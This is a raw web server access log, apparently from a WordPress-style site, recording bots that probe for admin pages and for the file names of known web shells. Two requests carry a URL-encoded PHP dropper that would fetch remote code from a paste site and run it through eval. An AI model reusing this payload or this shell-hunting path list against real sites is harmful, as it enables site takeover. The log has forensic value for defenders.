52.178.137.1 - - [11/Aug/2025:22:04:52 +0300] "GET /ms-themes.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:52 +0300] "GET /options-general.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:52 +0300] "GET /options-reading.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:53 +0300] "GET /options-writing.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:53 +0300] "GET /ova.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:53 +0300] "GET /pages.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:53 +0300] "GET /php.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:54 +0300] "GET /php8.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:54 +0300] "GET /pinfo.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:55 +0300] "GET /radio.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:55 +0300] "GET /robots.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:55 +0300] "GET /rt.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:55 +0300] "GET /s.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:56 +0300] "GET /setup.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:56 +0300] "GET /simple.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:56 +0300] "GET /sts.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:56 +0300] "GET /system_log.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:57 +0300] "GET /test1.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:57 +0300] "GET /themes/zMousse/otuz1.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:57 +0300] "GET /tinyfilemanager.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:57 +0300] "GET /ty.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:58 +0300] "GET /users.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:58 +0300] "GET /w.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:58 +0300] "GET /wp-aa.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:58 +0300] "GET /wp-admin/ HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:59 +0300] "GET /wp-admin/admin.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:59 +0300] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:59 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "-"
159.65.155.99 - - [11/Aug/2025:21:17:53 +0300] "GET /wp-includes/Text/Diff/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:18:17 +0300] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:18:37 +0300] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:19:11 +0300] "GET /wp-includes/pomo/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:20:08 +0300] "GET /wp-includes/sitemaps/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:20:40 +0300] "GET /wp-includes/widgets/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:21:58 +0300] "GET /wp-includes/fonts/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:22:31 +0300] "GET /wp-includes/fonts/class-wp-font-collection.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
102.212.247.75 - - [11/Aug/2025:21:22:32 +0300] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 301 795 "-" "get_local:DCV"
102.212.247.75 - - [11/Aug/2025:21:22:42 +0300] "GET /.well-known/pki-validation/about.php HTTP/1.1" 301 795 "-" "get_local:DCV"
159.65.155.99 - - [11/Aug/2025:21:22:59 +0300] "GET /wp-includes/fonts/class-wp-font-face.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:23:28 +0300] "GET /wp-includes/fonts/class-wp-font-utils.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:23:44 +0300] "GET /wp-includes/images/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:23:58 +0300] "GET /wp-includes/images/crystal/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:24:20 +0300] "GET /wp-includes/images/media/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:24:43 +0300] "GET /wp-includes/images/smilies/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:25:42 +0300] "GET /wp-includes/js/plupload/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
66.249.74.105 - - [11/Aug/2025:21:47:01 +0300] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.89.120.10 - - [11/Aug/2025:22:19:03 +0300] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
59.152.5.134 - - [11/Aug/2025:22:11:16 +0300] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:13:22 +0300] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:44:52 +0300] "GET /wp-content/uploads/ HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:44:56 +0300] "GET /wp-includes/ HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:44:59 +0300] "GET /wp-includes/css/ HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:45:30 +0300] "GET /wp-content/plugins/work-list/lang.php HTTP/1.1" 301 795 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:45:37 +0300] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 795 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
52.167.144.235 - - [11/Aug/2025:22:46:33 +0300] "GET /?p=1121980.html HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:47:58 +0300] "GET /wp-content/plugins/work-list/lang.php HTTP/1.1" 301 795 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:48:07 +0300] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 795 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:55:50 +0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:55:58 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:07 +0300] "GET /wp-head.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:26 +0300] "GET /fm1.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:31 +0300] "GET /alfadheat.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:41 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:46 +0300] "GET /wp-admin/images/admin.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:45:02 +0300] "GET /wp-includes/ID3/ HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:45:05 +0300] "GET /wp-includes/IXR/ HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:50:54 +0300] "GET /wp-22.php?sfilename=plugins.php&sfilecontent=%3C?php%20%20%20function%20get($url)%20%7B%20%20%20%20$ch%20=%20curl_init();%20%20%20%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20%20%20%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20%20%20%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20%20%20%20$data%20=%20curl_exec($ch);%20%20%20%20curl_close($ch);%20%20%20%20return%20$data;%7D$ok%20=%20'?%3E';%20%20%20%20%20%20eval(%22$ok%22%20.%20get('https://rentry.co/8uqon8hz/raw'));?%3E&supfiles=plugins.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:51:08 +0300] "GET /wp-22.php?sfilename=plugins.php&sfilecontent=%3C?php%20%20%20function%20get($url)%20%7B%20%20%20%20$ch%20=%20curl_init();%20%20%20%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20%20%20%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20%20%20%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20%20%20%20$data%20=%20curl_exec($ch);%20%20%20%20curl_close($ch);%20%20%20%20return%20$data;%7D$ok%20=%20'?%3E';%20%20%20%20%20%20eval(%22$ok%22%20.%20get('https://rentry.co/8uqon8hz/raw'));?%3E&supfiles=plugins.php HTTP/1.1" 301 795 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:55:54 +0300] "GET /ws.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:02 +0300] "GET /wp.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:10 +0300] "GET /wp-includes/wp-class.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:14 +0300] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:20 +0300] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:37 +0300] "GET /M1.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:49 +0300] "GET /alfanew.php7 HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:03 +0300] "GET /wp-content/shell20211028.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:12 +0300] "GET /wp-content/themes/finley/min.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:32 +0300] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:38 +0300] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:43 +0300] "GET /.well-known/pki-validation/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:51 +0300] "GET /wp-header.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:03 +0300] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:07 +0300] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:11 +0300] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:16 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:26 +0300] "GET /wp-content/plugins/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:45 +0300] "GET /wp-includes/fonts/wp-login.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:53 +0300] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:57 +0300] "GET /wp-content/dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:59:00 +0300] "GET /yanz.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:59:05 +0300] "GET /wp-content/plugins/fox/css.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:54 +0300] "GET /.well-known/wso112233.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:56:58 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:07 +0300] "GET /repeater.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:15 +0300] "GET /wso112233.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:19 +0300] "GET /dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:23 +0300] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:28 +0300] "GET /shell20211028.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:57:56 +0300] "GET /alfanew.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:00 +0300] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:21 +0300] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:32 +0300] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:37 +0300] "GET /wp-admin/maint/wp-login.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:41 +0300] "GET /wp-content/languages/wp-login.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:22:58:49 +0300] "GET /wp-content/admin.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:00:12 +0300] "GET /wp-content/plugins/anttt/simple.php HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:01:28 +0300] "GET /wp-content/plugins/wordpresss3cll/up.php HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
203.89.120.10 - - [11/Aug/2025:23:00:18 +0300] "GET /wp-content/plugins/wordpresss3cll/up.php HTTP/1.1" 301 795 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
